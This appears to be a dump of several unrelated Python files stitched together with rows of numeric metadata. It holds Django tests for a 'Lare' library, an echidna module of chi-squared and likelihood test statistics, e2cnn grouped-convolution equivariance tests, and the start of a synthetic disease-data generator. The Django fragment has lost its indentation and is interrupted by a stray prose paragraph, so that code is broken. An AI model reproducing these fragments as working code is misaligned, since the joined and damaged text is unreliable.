self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
# testing old version
def test_old_version(self):
versions = Lare.supported_version.split('.')
        versions[-1] = str(int(versions[-1]) - 1)
version = '.'.join(versions)
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE_VERSION': version, 'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_future_version(self):
versions = Lare.supported_version.split('.')
        versions[-1] = str(int(versions[-1]) + 1)
version = '.'.join(versions)
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE_VERSION': version, 'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
# testing non lare page
def test_non_lare_page(self):
client = Client()
response = client.get(reverse('no_lare_page'))
self.assertContains(response, self.no_lare_page_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
def test_non_lare_page_with_namespace(self):
client = Client()
response = client.get(reverse('no_lare_page'), **{'HTTP_X_LARE': 'Site2.Page1.Content1'})
self.assertContains(response, self.no_lare_page_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
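Outside Django's test client, the `HTTP_X_LARE` kwarg used in the tests above corresponds to an `X-Lare` request header sent by the client side (Django maps the header `X-Lare` to the `HTTP_X_LARE` META key). A rough sketch of the equivalent raw request; the URL and namespace below are illustrative only:

# Hypothetical request against a local dev server (sketch, not part of the tests)
import requests
requests.get('http://localhost:8000/page1/content1/',
             headers={'X-Lare': 'Site1.Page1.Content2'})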
| 52.649573
| 134
| 0.652354
| 1,352
| 12,320
| 5.695266
| 0.067308
| 0.14961
| 0.216104
| 0.116883
| 0.904805
| 0.884805
| 0.884805
| 0.882468
| 0.867792
| 0.843636
| 0
| 0.028241
| 0.221104
| 12,320
| 233
| 135
| 52.875536
| 0.774177
| 0.016964
| 0
| 0.66
| 0
| 0
| 0.167548
| 0.038334
| 0
| 0
| 0
| 0
| 0.45
| 1
| 0.09
| false
| 0
| 0.055
| 0
| 0.19
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ba10c5c24be5a493ed50999cb9c6db9320cf800b
| 24,603
|
py
|
Python
|
echidna/fit/test_statistic.py
|
snoplusuk/echidna
|
9bf38f7233ab172cbf123c1ca97f63df60220f44
|
[
"MIT"
] | 7
|
2015-01-29T13:59:26.000Z
|
2020-01-28T20:06:32.000Z
|
echidna/fit/test_statistic.py
|
snoplusuk/echidna
|
9bf38f7233ab172cbf123c1ca97f63df60220f44
|
[
"MIT"
] | 142
|
2015-01-05T10:57:53.000Z
|
2016-10-11T12:28:02.000Z
|
echidna/fit/test_statistic.py
|
snoplusuk/echidna
|
9bf38f7233ab172cbf123c1ca97f63df60220f44
|
[
"MIT"
] | 10
|
2015-01-08T10:18:32.000Z
|
2016-01-29T10:54:35.000Z
|
""" Module to hold classes for various test statistics that can be used
for fitting.
.. note:: All forms of chi-squared are as defined in:
* S. Baker & R. D. Cousins, Nucl. Inst. and Meth. in Phys. Res. 211,
437-442 (1984)
"""
import numpy
import abc
class TestStatistic(object):
""" Base class for the calculation of a test statistic.
The calculation of any test statistic is based on one spectrum
containing observed events and one containing expected events. It
is assumed that the observed events form the "data" spectrum and
the expected events form the spectrum predicted by the model.
Args:
name (string): Name of test statistic.
        per_bin (bool): If True the statistic in each bin is returned
            as a :class:`numpy.array`. If False (default) one value for
            the statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
__metaclass__ = abc.ABCMeta # Only required for python 2
def __init__(self, name, per_bin=False):
self._name = name
self._per_bin = per_bin
def get_name(self):
"""
Returns:
string: Name of test statistic, stored in :attr:`_name`
"""
return self._name
def compute_statistic(self, observed, expected):
""" Compute the value of the test statistic.
Args:
observed (:class:`numpy.ndarray`): 1D array containing the
observed data points.
expected (:class:`numpy.ndarray`): 1D array containing the
expected values predicted by the model.
Returns:
(float or :class:`numpy.array`): Computed value(s) of test
statistic. A float is returned if :attr:`_per_bin` is
False. Otherwise an array of computed test statistic
values, for each bin, is returned.
"""
if len(observed.shape) != 1:
raise TypeError("Incompatible shape %s for observed array, "
"expected 1-D array" % str(observed.shape))
if len(expected.shape) != 1:
raise TypeError("Incompatible shape %s for expected array, "
"expected 1-D array" % str(expected.shape))
if len(observed) != len(expected):
raise ValueError(
"Number of bins mismatch, for observed with %d bins, "
"and expected with %d bins" % (len(observed), len(expected)))
if not self._per_bin:
return self._compute(observed, expected)
else:
return self._get_stats(observed, expected)
# Method adapted from http://codereview.stackexchange.com/a/47115
@abc.abstractmethod
def _compute(self, observed, expected):
""" Calculates the test statistic.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated test statistic.
"""
return None
@abc.abstractmethod
def _get_stats(self, observed, expected):
""" Gets the test statistic for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
:class:`numpy.array`: Calculated chi squared for each bin.
"""
return None
@abc.abstractmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for this test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return None
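A concrete statistic only needs to provide the three abstract methods above. As a minimal illustrative sketch (the class and statistic below are made up, not part of the module):

# Illustrative only: a toy statistic implementing the TestStatistic interface
class TotalDiff(TestStatistic):
    """ Sums expected minus observed counts (toy example). """
    def __init__(self, per_bin=False):
        super(TotalDiff, self).__init__("total_diff", per_bin)

    def _compute(self, observed, expected):
        # Single number for the whole spectrum
        return float(numpy.sum(expected.astype('float') -
                               observed.astype('float')))

    def _get_stats(self, observed, expected):
        # One value per bin
        return expected.astype('float') - observed.astype('float')

    def get_penalty_term(self, current_value, prior, sigma):
        # Gaussian pull, matching the convention of the classes below
        return ((current_value - prior) / float(sigma)) ** 2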
class BakerCousinsChi(TestStatistic):
""" Test statistic class for calculating the Baker-Cousins
    chi-squared (Poisson likelihood) test statistic.
Args:
        per_bin (bool): If True the statistic in each bin is returned
            as a :class:`numpy.array`. If False (default) one value for
            the statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(BakerCousinsChi, self).__init__("baker_cousins", per_bin)
def _compute(self, observed, expected):
""" Calculates the chi-squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Baker-Cousins chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
total = 0
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
if obs < epsilon:
bin_value = exp
else:
bin_value = exp - obs + obs * numpy.log(obs / exp)
total += bin_value
return 2. * total
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
not_per_bin = self._compute(observed, expected)
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
stats = []
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
if obs < epsilon:
bin_value = exp
else:
bin_value = exp - obs + obs * numpy.log(obs / exp)
stats.append(bin_value)
stats = 2. * numpy.array(stats)
if not numpy.allclose(numpy.sum(stats), not_per_bin):
raise ValueError("Sum of chi squared array and value returned by "
"_compute method for same observed and expected "
"do not match!")
return stats
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the BakerCousinsChi test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/float(sigma)) ** 2
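For reference, `_compute` above implements the Baker-Cousins chi squared, chi2 = 2 * sum_i [E_i - O_i + O_i * ln(O_i / E_i)]. A minimal usage sketch (the arrays are made-up toy data, not from the module):

import numpy

observed = numpy.array([10., 12., 9., 0.])
expected = numpy.array([11., 11., 11., 1.])

chi = BakerCousinsChi()                   # per_bin=False: single float
print(chi.compute_statistic(observed, expected))

chi_bins = BakerCousinsChi(per_bin=True)  # one value per bin
print(chi_bins.compute_statistic(observed, expected))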
class BakerCousinsChiUp(TestStatistic):
""" Test statistic class for calculating the Baker-Cousins
    chi-squared (Poisson likelihood) test statistic. This test statistic only
counts upward fluctuations.
Args:
        per_bin (bool): If True the statistic in each bin is returned
            as a :class:`numpy.array`. If False (default) one value for
            the statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(BakerCousinsChiUp, self).__init__("baker_cousins_up", per_bin)
def _compute(self, observed, expected):
""" Calculates the chi-squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Baker-Cousins chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
total = 0
for exp, obs in zip(expected, observed):
if obs > exp:
continue
if exp < epsilon:
exp = epsilon
if obs < epsilon:
bin_value = exp
else:
bin_value = exp - obs + obs * numpy.log(obs / exp)
total += bin_value
return 2. * total
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
not_per_bin = self._compute(observed, expected)
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
stats = []
        for exp, obs in zip(expected, observed):
            # Mirror _compute: bins where observed exceeds expected are
            # skipped there, so they must contribute zero here or the
            # consistency check against not_per_bin below would fail
            if obs > exp:
                stats.append(0.)
                continue
            if exp < epsilon:
                exp = epsilon
            if obs < epsilon:
                bin_value = exp
            else:
                bin_value = exp - obs + obs * numpy.log(obs / exp)
            stats.append(bin_value)
stats = 2. * numpy.array(stats)
if not numpy.allclose(numpy.sum(stats), not_per_bin):
raise ValueError("Sum of chi squared array and value returned by "
"_compute method for same observed and expected "
"do not match!")
return stats
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
    for the BakerCousinsChiUp test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/float(sigma)) ** 2
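To see what the `obs > exp` skip in `_compute` does, compare the two statistics on a bin with an excess (toy numbers, for illustration only):

import numpy

observed = numpy.array([20., 5.])   # first bin fluctuates above expectation
expected = numpy.array([10., 10.])

print(BakerCousinsChi().compute_statistic(observed, expected))    # both bins counted
print(BakerCousinsChiUp().compute_statistic(observed, expected))  # excess bin skipped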
class BakerCousinsLL(TestStatistic):
""" Test statistic class for calculating the Baker-Cousins log likelihood
ratio test statistic.
Args:
        per_bin (bool): If True the statistic in each bin is returned
            as a :class:`numpy.array`. If False (default) one value for
            the statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(BakerCousinsLL, self).__init__("baker_cousins_ll", per_bin)
def _compute(self, observed, expected):
""" Calculates the log likelihood.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated log-likelihood value
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
        # Work on float copies so integer inputs divide correctly and the
        # caller's arrays are not modified in place
        observed = observed.astype('float')
        expected = expected.astype('float')
        epsilon = 1e-34  # In the limit of zero
total = 0
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = expected[i] - observed[i] + observed[i] *\
numpy.log(observed[i] / expected[i])
total += bin_value
return total
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated log-likelihood for each bin
"""
        # Work on float copies so integer inputs divide correctly and the
        # caller's arrays are not modified in place
        observed = observed.astype('float')
        expected = expected.astype('float')
        epsilon = 1e-34  # In the limit of zero
stats = []
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = expected[i] - observed[i] + observed[i] *\
numpy.log(observed[i] / expected[i])
stats.append(bin_value)
return numpy.array(stats)
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the BakerCousinsLL test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return 0.5 * ((current_value - prior)/sigma) ** 2
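Since `BakerCousinsLL._compute` omits the factor of 2 used in `BakerCousinsChi`, the two statistics satisfy chi2 = 2 * LL for identical inputs. A quick check with toy numbers:

import numpy

obs = numpy.array([10., 12.])
exp = numpy.array([11., 11.])
assert numpy.isclose(BakerCousinsChi().compute_statistic(obs, exp),
                     2. * BakerCousinsLL().compute_statistic(obs, exp))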
class Neyman(TestStatistic):
""" Test statistic class for calculating the Neyman chi-squared test
statistic.
Args:
        per_bin (bool): If True the statistic in each bin is returned
            as a :class:`numpy.array`. If False (default) one value for
            the statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(Neyman, self).__init__("neyman", per_bin)
def _compute(self, observed, expected):
""" Calculates chi squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Neyman's chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
        # Chosen due to backgrounds with low rates in ROI
        epsilon = 1e-34  # In the limit of zero
        # Work on float copies so integer inputs divide correctly and the
        # caller's arrays are not modified in place
        observed = observed.astype('float')
        expected = expected.astype('float')
total = 0
for i in range(len(observed)):
if observed[i] < epsilon:
observed[i] = epsilon
if expected[i] < epsilon:
bin_value = observed[i]
else:
bin_value = (expected[i] - observed[i])**2 / observed[i]
total += bin_value
return total
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
        # Chosen due to backgrounds with low rates in ROI
        epsilon = 1e-34  # In the limit of zero
        # Work on float copies so integer inputs divide correctly and the
        # caller's arrays are not modified in place
        observed = observed.astype('float')
        expected = expected.astype('float')
stats = []
for i in range(len(observed)):
if observed[i] < epsilon:
observed[i] = epsilon
if expected[i] < epsilon:
bin_value = observed[i]
else:
bin_value = (expected[i] - observed[i])**2 / observed[i]
stats.append(bin_value)
return numpy.array(stats)
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the Neyman chi squared test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/sigma) ** 2
class Pearson(TestStatistic):
""" Test statistic class for calculating the Pearson chi-squared test
statistic.
Args:
        per_bin (bool): If True the statistic in each bin is returned
            as a :class:`numpy.array`. If False (default) one value for
            the statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(Pearson, self).__init__("pearson", per_bin)
def _compute(self, observed, expected):
""" Calculates chi squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
float: Calculated Pearson's chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
        # Chosen due to backgrounds with low rates in ROI
        epsilon = 1e-34  # Limit of zero
        # Work on float copies so integer inputs divide correctly and the
        # caller's arrays are not modified in place
        observed = observed.astype('float')
        expected = expected.astype('float')
total = 0
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = (observed[i] - expected[i])**2 / expected[i]
total += bin_value
return total
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
        # Chosen due to backgrounds with low rates in ROI
        epsilon = 1e-34  # In the limit of zero
        # Work on float copies so integer inputs divide correctly and the
        # caller's arrays are not modified in place
        observed = observed.astype('float')
        expected = expected.astype('float')
stats = []
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = (observed[i] - expected[i])**2 / expected[i]
stats.append(bin_value)
return numpy.array(stats)
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the Pearson chi squared test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/sigma) ** 2
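The only difference between `Neyman` and `Pearson` is the denominator: Neyman divides by the observed counts, Pearson by the expected ones, so they disagree whenever observed and expected differ. A toy comparison:

import numpy

obs = numpy.array([9., 16.])
exp = numpy.array([10., 12.])
print(Neyman().compute_statistic(obs, exp))   # sum((E - O)**2 / O) = 1/9 + 1
print(Pearson().compute_statistic(obs, exp))  # sum((O - E)**2 / E) = 1/10 + 4/3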
class ExtendedLL(TestStatistic):
""" Test statistic class for calculating the Extended Log Likelihood test
statistic.
Args:
        per_bin (bool): If True the statistic in each bin is returned
            as a :class:`numpy.array`. If False (default) one value for
            the statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(ExtendedLL, self).__init__("extended_ll", per_bin)
def _compute(self, observed, expected):
""" Calculates the Extended Log Likelihood value.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Extended Log Likelihood value.
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # In the limit of zero
total = 0
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
bin_value = obs * numpy.log(exp)
total += bin_value
return expected.sum() - total
def _get_stats(self, observed, expected):
""" Gets the Extended Log Likelihood value for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated Extended Log Likelihood value
for each bin
"""
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # In the limit of zero
stats = []
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
bin_value = obs * numpy.log(exp)
stats.append(exp - bin_value)
return numpy.array(stats)
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the Extended Log Likelihood test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/sigma) ** 2
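All the penalty terms above are Gaussian pulls on a fit parameter; only `BakerCousinsLL` carries the extra factor of 1/2 matching its log-likelihood convention. Toy numbers, with the parameter half a sigma from its prior:

print(BakerCousinsChi().get_penalty_term(105., 100., 10.))  # (5/10)**2 = 0.25
print(BakerCousinsLL().get_penalty_term(105., 100., 10.))   # 0.5 * 0.25 = 0.125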
| 35.197425
| 78
| 0.592204
| 2,957
| 24,603
| 4.85323
| 0.066283
| 0.047383
| 0.052261
| 0.033168
| 0.882726
| 0.877291
| 0.868372
| 0.839663
| 0.831092
| 0.823357
| 0
| 0.005005
| 0.325895
| 24,603
| 698
| 79
| 35.247851
| 0.860295
| 0.479413
| 0
| 0.850187
| 0
| 0
| 0.048666
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11236
| false
| 0
| 0.007491
| 0
| 0.2397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e86a4dabb9f2d7976f62255713ee0e659b68b271
| 4,149
|
py
|
Python
|
test/nn/test_grouped_convolution.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 356
|
2019-11-22T10:37:22.000Z
|
2022-03-25T14:42:45.000Z
|
test/nn/test_grouped_convolution.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 52
|
2020-01-20T16:51:36.000Z
|
2022-03-31T21:40:19.000Z
|
test/nn/test_grouped_convolution.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 48
|
2019-12-11T09:29:30.000Z
|
2022-03-18T17:51:55.000Z
|
import unittest
from unittest import TestCase
from e2cnn.nn import *
from e2cnn.gspaces import *
import numpy as np
class TestGroupedConv(TestCase):
def test_cyclic(self):
N = 4
g = Rot2dOnR2(N)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
# r1 = FieldType(g, [g.trivial_repr])
# r2 = FieldType(g, [g.regular_repr])
s = 7
sigma = None
# fco = lambda r: 1. * r * np.pi
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_so2(self):
N = 5
g = Rot2dOnR2(-1, N)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
s = 7
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_dihedral(self):
N = 8
g = FlipRot2dOnR2(N, axis=np.pi/3)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
# r1 = FieldType(g, [g.trivial_repr])
# r2 = FieldType(g, [g.fibergroup.irrep(1, 0)])
# r2 = FieldType(g, [irr for irr in g.fibergroup.irreps.values() if irr.size == 1])
# r2 = FieldType(g, [g.regular_repr])
s = 7
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_o2(self):
N = 5
g = FlipRot2dOnR2(-1, N)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
s = 7
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_flip(self):
# g = Flip2dOnR2(axis=np.pi/3)
g = Flip2dOnR2(axis=np.pi/2)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
s = 9
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(32):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
if __name__ == '__main__':
unittest.main()
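Every test above repeats the same build/init/check block for a different gspace. Factored once as a sketch, using only calls that already appear in this file (the helper itself is hypothetical, not part of the suite; sigma and frequencies_cutoff default to None as in the tests):

def run_equivariance_check(gspace, groups=5, s=7, n_init=8):
    # Build matching input/output field types repeated `groups` times
    r1 = FieldType(gspace, list(gspace.representations.values()) * groups)
    r2 = FieldType(gspace, list(gspace.representations.values()) * groups)
    cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
                sigma=None, frequencies_cutoff=None, bias=True)
    # Re-initialise several times and check equivariance each time
    for _ in range(n_init):
        init.generalized_he_init(cl.weights.data, cl.basisexpansion)
        cl.eval()
        cl.check_equivariance()

# e.g. run_equivariance_check(Rot2dOnR2(4)) mirrors test_cyclic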
| 30.065217
| 91
| 0.511931
| 488
| 4,149
| 4.266393
| 0.165984
| 0.076849
| 0.067243
| 0.072046
| 0.835735
| 0.817483
| 0.817483
| 0.817483
| 0.809798
| 0.789625
| 0
| 0.035276
| 0.371415
| 4,149
| 137
| 92
| 30.284672
| 0.763037
| 0.142444
| 0
| 0.76087
| 0
| 0
| 0.010744
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054348
| false
| 0
| 0.054348
| 0
| 0.119565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cdcad2664ff4fc0a983277b7f4006530dd6c313
| 1,861
|
py
|
Python
|
data/synthetic_disease/generate.py
|
dheeraj7596/DPPred
|
125a1a9df2fdd2349ee24ad457fcada653af0975
|
[
"MIT"
] | 10
|
2017-09-18T01:44:56.000Z
|
2020-10-29T14:03:01.000Z
|
data/synthetic_disease/generate.py
|
dheeraj7596/DPPred
|
125a1a9df2fdd2349ee24ad457fcada653af0975
|
[
"MIT"
] | 1
|
2019-05-21T08:20:07.000Z
|
2019-06-17T18:18:42.000Z
|
data/synthetic_disease/generate.py
|
dheeraj7596/DPPred
|
125a1a9df2fdd2349ee24ad457fcada653af0975
|
[
"MIT"
] | 3
|
2018-01-23T18:14:51.000Z
|
2020-08-27T05:56:18.000Z
|
import random
random.seed(19910724)
N = 100000
out = open('train.csv', 'w')
out.write('age,gender=Male,gender=Female,LT1=A,LT1=B,LT1=O,LT1=AB,LT2,label\n')
for i in range(N):
feats = []
age = random.randint(1, 60)
feats.append(str(age))
gender = random.randint(0, 1)
feats.extend([str(gender), str(1 - gender)])
blood = random.randint(0, 3)
